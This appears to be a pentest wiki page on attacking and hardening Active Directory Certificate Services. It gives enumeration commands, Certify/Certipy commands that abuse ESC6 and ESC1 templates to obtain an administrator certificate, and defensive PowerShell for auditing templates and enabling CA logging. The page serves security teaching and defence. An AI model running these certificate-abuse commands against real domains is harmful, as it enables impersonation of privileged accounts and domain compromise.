
AD CS


Last updated 2 years ago

Active Directory Certificate Services (AD CS) is a feature of Active Directory that allows a designated server to issue certificates. It helps environments deploy and benefit from the security advantages of certificate-based authentication.

For a far better explained write-up on exploiting AD CS, I highly recommend checking out SpecterOps' article (see References).

Additionally, the notes from the Relaying section are essential to understanding the AD CS attack chain.

Enumerate AD CS

If any of the methods below gets a hit, browse to the identified host's web enrollment interface at the following URL (substituting the CA host for localhost): http://localhost/certsrv/

Certutil

Dump and display certification authority information with Certutil.exe. This utility quickly identifies whether the domain has a certificate authority that is in scope for AD CS attacks:

Certutil -ping
Certutil.exe -tcainfo

CrackMapExec

crackmapexec smb $ip -u $username -p $password -M adcs

Certify

When dealing with AD CS, Certify and Certipy are going to be your best friends.

# Identify and list vulnerable templates with Certipy
certipy find -u $username -p $password -dc-ip $dcip -vulnerable

# Identify and list vulnerable templates with Certify
Certify.exe find /vulnerable

Exploitation

The following section builds on several publicly available repositories that are referenced at the bottom of this page. There are multiple ways to exploit vulnerable certificate templates, so I highly recommend searching red team wikis and blogs for one that fits your use case.

EDITF_ATTRIBUTESUBJECTALTNAME2 (ESC6)

If this attribute is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name.

In attacker-speak, the above quote from Microsoft means that we can enroll in any template configured for domain authentication that also allows unprivileged users to enroll, supplying a subject alternative name of our choosing. This lets the attacker obtain a certificate that authenticates as any user or machine on the domain.

This setting is disabled by default.

# Find all enabled certificate templates:
Certify.exe find

# Abuse a template on a CA with this setting configured
Certify.exe request /ca:CA01.oasis.local\CorpCA /template:User /altname:$impersonateuser

Exploiting ESC1

## https://github.com/ly4k/Certipy
### Note that the CA, target, and template names can all be identified from the output of certipy find.

pip3 install certipy-ad
certipy find -u parz@oasis.local -p $password -dc-ip $dcip
certipy req -username parz@oasis.local -password $password -ca $ca -target $cahost -template $templatename -upn administrator@oasis.local -dns dc.oasis.local
certipy auth -pfx administrator_dc.pfx -dc-ip $dcip
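As an added example (not from the original page, nor from the Certify or Certipy projects), the same two checks seen from the defender's side with the ActiveDirectory PowerShell module: which CAs exist and what they publish (the enumeration step above), and which published templates meet the ESC1 conditions that the certipy req command above abuses. The flag bits and EKU OIDs are the documented msPKI values; the only assumption is a domain-joined host with RSAT installed.

```powershell
# Added example, not from the original page: audit published certificate templates for the ESC1
# conditions with the ActiveDirectory module. Flag bits and EKU OIDs are the documented msPKI values.
Import-Module ActiveDirectory

$pkiDn = "CN=Public Key Services,CN=Services,$((Get-ADRootDSE).configurationNamingContext)"

# Enrollment services (CAs) and the templates they publish; an unpublished template cannot be requested.
$published = Get-ADObject -SearchBase "CN=Enrollment Services,$pkiDn" `
    -LDAPFilter '(objectClass=pKIEnrollmentService)' -Properties certificateTemplates, dNSHostName |
    ForEach-Object { $ca = $_
        foreach ($t in $ca.certificateTemplates) {
            [pscustomobject]@{ CA = "$($ca.dNSHostName)\$($ca.Name)"; Template = $t } } }

$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # msPKI-Certificate-Name-Flag: requester supplies subject/SAN
$CT_FLAG_PEND_ALL_REQUESTS         = 0x2   # msPKI-Enrollment-Flag: manager approval required
$authEkus = '1.3.6.1.5.5.7.3.2',           # Client Authentication
            '1.3.6.1.5.2.3.4',             # PKINIT Client Authentication
            '1.3.6.1.4.1.311.20.2.2',      # Smart Card Logon
            '2.5.29.37.0'                  # Any Purpose
$enrollRight = [guid]'0e10c968-78fb-11d2-90d4-00c04f79dc55'   # Certificate-Enrollment extended right

function Test-Esc1Template ($Template) {
    # No EKU at all also counts: such a certificate is usable for any purpose, including logon
    $ekus = @($Template.pKIExtendedKeyUsage | Where-Object { $_ })
    (($Template.'msPKI-Certificate-Name-Flag' -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) -ne 0) -and
    (($Template.'msPKI-Enrollment-Flag' -band $CT_FLAG_PEND_ALL_REQUESTS) -eq 0) -and
    ([int]$Template.'msPKI-RA-Signature' -eq 0) -and
    ($ekus.Count -eq 0 -or ($ekus | Where-Object { $authEkus -contains $_ }))
}

Get-ADObject -SearchBase "CN=Certificate Templates,$pkiDn" -LDAPFilter '(objectClass=pKICertificateTemplate)' `
    -Properties msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature, pKIExtendedKeyUsage, nTSecurityDescriptor |
    Where-Object { $published.Template -contains $_.Name -and (Test-Esc1Template $_) } |
    ForEach-Object {
        $tmpl = $_
        # Who may enroll: Enroll extended right, all extended rights, or GenericAll on the template
        $enrollers = $tmpl.nTSecurityDescriptor.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and (
                $_.ObjectType -eq $enrollRight -or
                ($_.ActiveDirectoryRights -band 'ExtendedRight' -and $_.ObjectType -eq [guid]::Empty) -or
                ($_.ActiveDirectoryRights -band 'GenericAll'))
        } | Select-Object -ExpandProperty IdentityReference -Unique
        [pscustomobject]@{
            Template    = $tmpl.Name
            PublishedOn = ($published | Where-Object Template -eq $tmpl.Name).CA -join ', '
            CanEnroll   = $enrollers -join '; '
        }
    } | Format-Table -Wrap
```

A template that appears in this output with a low-privileged group in CanEnroll is the exact condition certipy find -vulnerable reports as ESC1; fixing it means clearing the supply-in-request flag, requiring manager approval, or tightening the enrollment ACL.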

Mitigation

One of the easiest ways to help detect exploitation of AD CS is to enable Certificate Authority logging. AD CS does not enable logging by default, which in the case of an incident will prevent an organization from responding effectively. This is easily remediated:

# Enable CA Logging
certutil.exe -setreg CA\AuditFilter 127
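Added example (not from the original page): a CA-side PowerShell check that covers both the ESC6 setting described above and this logging recommendation. It reads policy\EditFlags with certutil, clears the EDITF_ATTRIBUTESUBJECTALTNAME2 bit if present, and enables the audit filter together with the Security-log audit subcategory it depends on. It assumes it is run elevated on the CA host.

```powershell
# Added example, not from the original page. Run elevated on the CA host: reports and clears the
# ESC6 EditFlags bit, then enables CA auditing end to end (registry filter plus audit subcategory).
$EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x40000   # documented EditFlags bit

function Get-CaEditFlags {
    # certutil prints e.g. "  EditFlags REG_DWORD = 15014e (1376590)"; parse the hex value
    $m = certutil -getreg policy\EditFlags | Select-String 'EditFlags\s+REG_DWORD\s*=\s*([0-9a-fA-F]+)'
    if (-not $m) { throw 'Could not read policy\EditFlags; run this on the CA host as an administrator' }
    [Convert]::ToInt32($m.Matches[0].Groups[1].Value, 16)
}

$flags = Get-CaEditFlags
if ($flags -band $EDITF_ATTRIBUTESUBJECTALTNAME2) {
    Write-Warning 'EDITF_ATTRIBUTESUBJECTALTNAME2 is set: any requester can supply a SAN (ESC6)'
    certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2   # clear the bit
} else {
    Write-Host 'EDITF_ATTRIBUTESUBJECTALTNAME2 is not set'
}

# AuditFilter 127 turns on all seven CA audit categories, but the events only reach the Security
# log when the "Certification Services" audit subcategory is enabled as well.
certutil -setreg CA\AuditFilter 127
auditpol /set /subcategory:"Certification Services" /success:enable /failure:enable
Restart-Service CertSvc   # both registry changes take effect on service restart

# Verify, then watch for Security events 4886 (request received) and 4887 (certificate issued)
certutil -getreg CA\AuditFilter
auditpol /get /subcategory:"Certification Services"
```

Without the auditpol step the AuditFilter value alone produces no events, which is the most common reason a CA that "has logging enabled" still shows nothing during an incident.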

Additionally, it is recommended to perform regular auditing with tools such as Certify/Certipy or PSPKIAudit to detect vulnerable certificate templates. Settings like the ones covered in this section can be discovered and exploited using Certify, so auditing with the same tooling shows what an attacker would see.

References

SpecterOps: https://posts.specterops.io/certified-pre-owned-d95910965cd2
GitHub - GhostPack/PSPKIAudit: PowerShell toolkit for AD CS auditing based on the PSPKI toolkit
AD CS Abuse, Pentester's Promiscuous Notebook
Certificate templates, The Hacker Recipes
Securing PKI: Technical Controls for Securing PKI, Microsoft Docs
Microsoft ADCS – Abusing PKI in Active Directory Environment, RiskInsight